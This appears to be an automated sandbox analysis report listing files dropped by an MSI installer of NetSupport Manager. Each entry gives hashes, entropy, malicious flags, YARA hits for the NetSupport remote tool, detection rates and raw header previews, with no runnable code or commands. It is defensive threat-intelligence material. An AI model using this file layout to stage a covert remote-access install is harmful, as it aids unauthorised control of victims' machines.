                                                                                                                    SHA-512:1BEE509F17AB29D12FD2963A5F1EAF5592166215AA5C7BF570BFEBA1455D48DC64FC04DAEAA6F4C17FA8B0ECAF71D18DA6207E417C03713012CD27D8E9E019F5
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.lH...................s..............s..7...s..................-.......P...s.....s..?...s......s..............s......Rich............................PE..L....(hf...........!.....hY..,.......T.......Y... ...........................v......8v...@..........................0i.G.....h.0....`n.`.............u..]....m..4....Y..............................Lc.@.............Y.l...L.h......................text....fY......hY................. ..`.rdata..7.....Y......lY.............@..@.data... ....@i..p...(i.............@....rsrc...`....`n.......l.............@..@.reloc...D....m..F....k.............@..@.nsld.........v.......t.............@...................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):22656
                                                                                                                    Entropy (8bit):6.252604525322096
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:fFZj8MgCiZetfffX3/9e0mfu2rjWevHqnYPL7NCUHeMZR:f8MXlfffX3/9e3z2evqEdR
                                                                                                                    MD5:84DEE0F25FE97868071202065DAB63BB
                                                                                                                    SHA1:64A6C2E0D4561A726BDCE5491D12693A96C45839
                                                                                                                    SHA-256:DE5ACE5C2A02AFB01A90BA39B305A8F3C783883012432D22912910EAD44AD60A
                                                                                                                    SHA-512:200A162CAD66B4EAF94B02F31FA6986028B42EA4497D234131CE3F6B8154146C00881FC75F63B077B0CCDD47A62340440884EFF2199F00D4F035622903FB8D1F
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w.[...[...[...[...h...-"b.X...-"d.Y...|yt.X...|yd.Z...-"t.Z...|yh.Y...|ye.Z...|ya.Z...Rich[...................PE..d.....(Y.........."......$...........a.......................................................................................................b..(....p.......P.......:..........P....1...............................................0...............................text............................... ..h.rdata.......0......................@..H.data...D....@......."..............@....pdata.......P.......(..............@..HINIT.........`.......*.............. ....rsrc........p.......4..............@..B.reloc...............8..............@..B........................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\product.dat

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):506
                                                                                                                    Entropy (8bit):4.906453708261214
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:NUQi44RRN4CZCgivf2Ik2IgC0cxP/6Xrov:iJ4y4CZC/f2/2B2H6O
                                                                                                                    MD5:FF7C0D2DBB9195083BBABAFF482D5ED6
                                                                                                                    SHA1:5C2EFBF855C376CE1B93E681C54A367A407495DC
                                                                                                                    SHA-256:065D817596D710D5A06060241ACC207B82B844530CC56FF842FF53D8FF92A075
                                                                                                                    SHA-512:EA226B3A55FC59175136F104DF497EBF5055624FB1C1C8073B249DFC5E1ED5818A6FEEE995AA82CF9ED050F1ADC7A62994C90B1AF03569DFE0D4551EE2BC70C9
                                                                                                                    Malicious:false
                                                                                                                    Preview:5..0x61f7dbcb..LongName=NetSupport Manager..ShortName=NSM..Home=NSM..TLA=NSM..NSSName=NetSupport School..NSSTLA=NSS..SupportWWW=www.pci.co.uk/support|http://www.pci.co.uk/support..SupportEMail=support@pci.co.uk|mailto:support@pci.co.uk..NSMAppDataDir=NetSupport\NetSupport Manager..NSSAppDataDir=NetSupport\NetSupport School..NSSConfName=NetSupport School..AssistantName=Tutor Assistant..AssistantURL=http://www.netsupportschool.com/tutor-assistant.asp..TechConsole=1..SupportsChrome=1..SupportsAndroid=1..

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):39392
                                                                                                                    Entropy (8bit):7.268505171847185
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:vnIX3dawZwW87doDaK8r2pe/42/HDHf/ck6r2pe/s3zHDHf/ckW/:C3dFGWTO3ee/46jHeee/sDjHC
                                                                                                                    MD5:53608AEEEF65674552C7A28A4F918D1F
                                                                                                                    SHA1:DABE4E6DC6A7CF446BA76BDA7F18AAE7B08177E4
                                                                                                                    SHA-256:C8B9142A399CB7171F05379E34D4D1D34659A033FD99E994BABA103E6D0D8FE3
                                                                                                                    SHA-512:DF58AA3E582986B80A2FA3CD395B14357ABEC7A50FA790E1723F0F9B37477476782169EC86EC259ED210C4CBC1241EF1336182AAE5C6C87994D0B00D7C16A074
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........68.^WV.^WV.^WV..X..TWV.y.+.XWV.^WW.(WV.y.-.]WV.y.;.iWV.y.,._WV.y.8.QWV.y.(._WV.y..._WV.Rich^WV.........PE..L...'.}S...........!.........................@....@..........................`......Sy...............................<......L5.......................<...]...P......@...................................@...............8............................text...j-.......................... ..`.data...P....@.......2..............@....reloc.......P.......6..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):39904
                                                                                                                    Entropy (8bit):7.13635504885649
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:0E4XbRSshW4r2pe/6qHDHf/ckF6Nr2pe/XfJHDHf/ckbmr:uLktYee/vjHh6Jee/XRjHGr
                                                                                                                    MD5:834B482E183006E4CA6644CBA6F7A1A8
                                                                                                                    SHA1:E80B54FD273A31B6E70EA1514ABAE2B931E126D2
                                                                                                                    SHA-256:D0F829E161FB425667DAB3CAE56BFD3F0CC753145606A518B1C38BB5DCD4C100
                                                                                                                    SHA-512:3592A9540C9F5C33009E577449A426A8E1843E7F908178C911BD4410871B455485F2CE006D5BE5C2146C29252407BC9E11A6D8A583EF75CE73006444C7477E3B
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L%...D...D...D..~...D../....D../...:D../....D...D...D../....D..~...D../....D../....D../....D../....D..Rich.D..................PE..d.....}S.........." .....0..........H.........@..............................p......................................................0?......@6...............P.......>...]...`..........................................................x............................text..../.......0.................. ..`.data........@.......4..............@....pdata.......P.......:..............@..@.reloc..b....`.......<..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):77280
                                                                                                                    Entropy (8bit):6.793769574007511
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:1fafvTuNOwphKuyUHTqYXHhrXH4LLIywmoEee/MjHFee/s3jH9:1afLSpAFUzt0LLIywYeZjleRjd
                                                                                                                    MD5:B25AE8C65D0BAF1AD9B51DBF7E0E738A
                                                                                                                    SHA1:29EDDB6C96B9A58302B5FDF85919A231F448970A
                                                                                                                    SHA-256:340328207279A098B5C8CAFDF3A6E2DEB28C06C077D04423E084EBAD93353B83
                                                                                                                    SHA-512:8C22BF990978C752F6E6292CFB75B31228369E4B77D68DAA912D26302449217830E5C305446840765D3FB3F10EA575CE695A165E835570F0BC1DB44F2AB49BDA
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...T.oe.....................J.......!............@.......................... .......O....@....................................<.......8................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...8...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\shfolder.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):46832
                                                                                                                    Entropy (8bit):6.550943579230967
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:aYxDdwTWm8lJuEFer2pe/p+DHDHf/cklPr2pe/a/fHDHf/ckT:aYDwTelJuEFuee/kjHRee/OjHv
                                                                                                                    MD5:856CE968807C6915FE987E5D39FCC701
                                                                                                                    SHA1:30F881812243B98424BB22ED7CCD911E2BD0E2A1
                                                                                                                    SHA-256:96E0F092E8E930D0989AED462789045392C9159132A35DDDA513C18E495ADDBA
                                                                                                                    SHA-512:1D1500F95797CFC61728D10F17E1F22762DD7848CD5D8EA978A22170756C77AC9A5A2AC182C137DE8A49E149034CCBF6DA11547B757AFC90581DBABC90D1B048
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L...9.G8....K......#..... ...2.......'.......0....0q....................................................................k...l)..<....@...,...........Y...]...p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc....,...@.......(..............@..@.reloc.......p.......V..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\startlogo.bmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PC bitmap, Windows 3.x format, 301 x 50 x 24, image size 45202, resolution 2834 x 2834 px/m, cbSize 45256, bits offset 54
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):45256
                                                                                                                    Entropy (8bit):1.7322107663428339
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:9w+PTPP6Q9k+BIwe0WRpLmfL8TkLUtyAeCzNPzat1Arxtgx/:9w+rPTTD8T90r6t+x
                                                                                                                    MD5:E9FCFFB9D2942FB4F8693D0955741C02
                                                                                                                    SHA1:7BE4057624103FD3A5A6127DD205797F0750DE5D
                                                                                                                    SHA-256:1D88DC4653BA74CFB65B74EA23CFA42B38A7A9367420C801E1267C27D218C740
                                                                                                                    SHA-512:9B01B09181BDDF01468B6D1AD61084D27F9FADDD1992A9B0449DA661E2BCFE443C0F668871676DF94E871DBDD9BB4F2F65E175C291AEAE4E1C007FEE6348E4E4
                                                                                                                    Malicious:false
                                                                                                                    Preview:BM.......6...(...-...2......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................c..........................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2102752
                                                                                                                    Entropy (8bit):6.453089786609498
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:e4PM40C89/wp1LsHQFT0qr/H8tTrp7zUbMwOi9NR/Feoke6fUiWZF7tfTHdWq:e4EG8a/sHQFTZHeTrp7zUbMwZhF7ke6W
                                                                                                                    MD5:A14A67BADCAFD7F70925865FC36CF23A
                                                                                                                    SHA1:987160B998D3C84DA5EA4A3D7687DC4B5B14F6A3
                                                                                                                    SHA-256:EB8529698A60A96E2224C298AE0CB8365A46898082CCCFE79356B23057A02A6C
                                                                                                                    SHA-512:AA592B65CB7DB2CC8D8E8F47E1CB1810F3BDF52D44724BB3902D04FFC73BDBDC80E4A0509F25E33A4C3D2C67BD2BB0E9CB6D0C77DF2E48FD1AFD277B3B3F1183
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......bn..&.`[&.`[&.`[.A.['.`[/w.[*.`[Iy.[..`[Iy.[..`[/w.[..`[&.a[D.`[Iy.[..`[Iy.[..`[Iy.['.`[Iy.['.`[Rich&.`[........PE..L...x.oe..........................................@...........................!....... ...@.................................P............\...............]... ..T...................................H9..@............................................text............................... ..`.rdata...U.......V..................@..@.data........ ...~..................@....rsrc....\.......^..................@..@.reloc..8.... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\toastChat.png

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):15766
                                                                                                                    Entropy (8bit):2.0905725373226205
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:K4S8+k29W8sEvVQAxN+Y9HC5TZ/gBCNLNLXC54x4I7cdpanub7Te7gMHDI31t+jY:XS5kEWR4QAxNXqdv34CcXjTe7uFiY
                                                                                                                    MD5:515B10CD836D4F5874037A43F1E77451
                                                                                                                    SHA1:8ADF1CE3954CF17169F468ED4DD350B0FD5C4CDA
                                                                                                                    SHA-256:90FF8555B7DBFE2CFE5D2761CCC491153B7C42085E0C490970BF9EB3C150F25A
                                                                                                                    SHA-512:9CEA72979FD5EA34579E67E9E17D6AF2F6FD354A88573A3D878DFDDF3C0AFD94FA02ABB42C5BCEB6F9D208BEC194018733B8EDA075ED8D36F7CE16C5402AFE2B
                                                                                                                    Malicious:false
                                                                                                                    Preview:.PNG........IHDR..............>a.....pHYs..........+....9.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2013-03-16T11:09:05Z</xmp:CreateDate>. <xmp:ModifyDate>2013-08-28T11:40:14+01:00</xmp:ModifyDate>. <xmp:MetadataDat

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\toastImageAndText.png

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4081
                                                                                                                    Entropy (8bit):7.869168767091338
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:NZ/I09Da01l+gmkyTt6Hk8nTo2IbRDzqMYCKg:NS0tKg9E05TovbRDznYE
                                                                                                                    MD5:0A5913FD6ECAE07F96F1FE4D2E9BE596
                                                                                                                    SHA1:C2CF5940D9FFED0E48A4C9BDB267A26132A6F7CD
                                                                                                                    SHA-256:3A7D175DC12A1A71DD4E1842321B03BDCD3E35F4AEA38D594E02A5AC883DD1C6
                                                                                                                    SHA-512:7BC5BD2785087655A58345171CCDB417FCA4AB4B1F74C743DDA853EEFA6F4A823A49B9172580BA4547CCD56E4BE095F8D9ACF5B6E83C2EAF56D5EA594434F8BA
                                                                                                                    Malicious:false
                                                                                                                    Preview:.PNG........IHDR..............>a.....pHYs..........o.d...OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\toastMessage.png

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):15345
                                                                                                                    Entropy (8bit):1.827778496152507
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:K4S8+k29W8sEv7BNBhxN+Y9Wn8+BC6tjLixBZI7cdpanub7ZQy7AZ:XS5kEWRyBNBhxNXW82KBZCcXjegI
                                                                                                                    MD5:51957F938C93454E2F3ED13519EBBFC6
                                                                                                                    SHA1:DF094723F61FEC1111C496D2AFC89FDE0EF80A44
                                                                                                                    SHA-256:A0EA911CFDF05131B779DE0816B0BEC0D833A9DA1B49AACB098B84A0F871CF56
                                                                                                                    SHA-512:3723A1C0314AE2396ED2E062F111762B4ED927A062876F189105FC46B9606B326934484C027DDD49F02BC273C924D40A7C96C0CC6375857D6A622CB8F631A72D
                                                                                                                    Malicious:false
                                                                                                                    Preview:.PNG........IHDR..............>a.....pHYs..........+....9.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2013-03-16T11:09:10Z</xmp:CreateDate>. <xmp:ModifyDate>2013-08-28T11:38:54+01:00</xmp:ModifyDate>. <xmp:MetadataDat

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\ucrtbase.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):883712
                                                                                                                    Entropy (8bit):6.824170675528273
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:0WmPrDND1ONC1r4pD84TfEXpS8sYsen/mKvTZuoy4YJp:DmPrBu1ygr
                                                                                                                    MD5:8ED02A1A11CEC72B6A6A4989BF03CFCC
                                                                                                                    SHA1:172908FF0F8D7E1C0CBF107F7075ED1DBA4B36C8
                                                                                                                    SHA-256:4FD02F2699C49579319079B963425991198F59CB1589B8AFA8795B5D6A0E5DB3
                                                                                                                    SHA-512:444FE62A5C324D38BDC055D298B5784C741F3CA8FAAEAED591BD6DCF94205DBF28C7D7F7D3825CCB99EFF04E3FFD831E3F98D9B314820841A0C0960AE6A5E416
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............`.`.`....`.a...`.`..`..:..`..:..`..:....`..:....`..:....`..:..`..:..`.Rich..`.................PE..L...t.nU...........!................`k...............................................(....@A........................`...'............................<...@... ...V...u..8...........................8v..@............................................text............................... ..`.data...............................@....idata..d...........................@..@.rsrc...............................@..@.reloc...V... ...X..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):274256
                                                                                                                    Entropy (8bit):6.569709751417913
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:x4fMnGHxUCkewyeWmUyuueIDKTukcHWu2vizgPSA4qJH9013iSI3s:+fLHyApeWm4uTdkIWRizxkW1R
                                                                                                                    MD5:F45BBAC53C6DD05436F749ECBF22C1F2
                                                                                                                    SHA1:5F76AF19249B49505C36593434B68229357F52F9
                                                                                                                    SHA-256:0B85176125FC996D22B08D25A3344FC1E9C19ECC8A39D291F90ADB98EBAD6268
                                                                                                                    SHA-512:5B6BAE76F1A6CC8AA09E63802F157A53AC441608A158770FDCA5DE532BD74AA895AD8CB429A6A7CEE93844D7DE5882C0F1BC3BB433F4D1A9EC9FA6E1A5DEE5AA
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...........V........................................................:...........Rich...........PE..L......Z.........."!................0........0...............................@............@A.............................=..............................P-.......X.. J..8...........................XJ..@............................................text............................... ..`.data...Pp...0...n... ..............@....idata..L...........................@..@.rsrc...............................@..@.reloc...X.......Z..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\vcruntime140.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87360
                                                                                                                    Entropy (8bit):6.8832723005665555
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:Q7cAKWRMbpuRQci+7uXTKLWe+27JofZo0ENm2eK7oJnoUSgpAY8ODcDcm7cIsXFf:Q73KiRQcJ7uj8f7Jofm0ENm2eK7mnoU5
                                                                                                                    MD5:479349B9C24C0A52F504292544492ACC
                                                                                                                    SHA1:70DA788FA83DDD85FF72308D176352FB87C3D01D
                                                                                                                    SHA-256:CBCA683F6832E6AEA627F6BCA32788BBA056B78F3ED43015B6B45F8B22407C1F
                                                                                                                    SHA-512:890973D08EA2D02C88356CE75C64B608E05B153EDFD83C748A407E965A781321198D91A09C6573E9EEE1A3853A7C92E0283F9556878DF3C5776FDEBA78659A18
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .id..:d..:d..:..=:f..:m.A:o..:d..:L..:w..;k..:w..;w..:w..;`..:w..;...:w..;e..:w.-:e..:w..;e..:Richd..:........PE..L......Z.........."!......... ..............................................P............@A................................. .......0..................@?...@..H...p ..8............................ ..@............ ...............................text............................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc..H....@......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):345056
                                                                                                                    Entropy (8bit):6.291223638483511
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:I8RXllwWOZL6CrguQ4fPBIT2TxwyJMIL39+/ziP+9iBIcUaemeL:IUXDIZmydPTvb4RAVcbL
                                                                                                                    MD5:96E987D909600D34DD70C55F56EB8869
                                                                                                                    SHA1:3278FFE286AD6894685D5C4248E2E4EBB729E4E2
                                                                                                                    SHA-256:E627780C49513DFDDF394A5FE929C67D527256AF7407F2AE6CFA6A6996859F9A
                                                                                                                    SHA-512:DA9BE7015AAB9C447D5A72067BD6704165C56F3E355BA62018F809E6B7F0DC2D20040419A1366CB5DDAFA1EB6CEB51173EF382D214F130F6CA06175747B4B60A
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;.8DZ.kDZ.kDZ.k..ekEZ.k+,ckOZ.kM"nkIZ.kDZ.k.Z.k+,Wk.Z.k+,Vk.Z.k+,gkEZ.k+,`kEZ.kRichDZ.k........................PE..d.....oe.........."......B....................@....................................g.....@.................................................$........@..(Y......<6.......]...........f...............................................`...............................text...FA.......B.................. ..`.rdata.......`.......F..............@..@.data...H....P..."...*..............@....pdata..<6.......8...L..............@..@.rsrc...(Y...@...Z..................@..@.reloc..B...........................@..B................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):97376
                                                                                                                    Entropy (8bit):6.023234574132757
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:hkybYM1RAFHKrvngTwjhVkHtf0Y8L2dwz/ET9HB1kzQNlkm2aDCCR:7kM1RAFHKrvnYwjhVkHtsYU2dwoTZ3bb
                                                                                                                    MD5:52B88EB20BEB3B34A692A4CAE0FF2196
                                                                                                                    SHA1:26A297B2BAEB118F8856C1DE41EE855572BA958A
                                                                                                                    SHA-256:2B675E9C27D3FB01CB9DF2583B380DE8DC8C0D5BBBE18AF458F90B47C6D62B03
                                                                                                                    SHA-512:29567FC4DB46D85F9AB8F6ECF2A708EC2C8DEF2E49ECCD439DACEDA327B7411957B2014171A8370C3928D4A03A13BC6124D93678A87684370A5E6042D1C2AD6E
                                                                                                                    Malicious:true
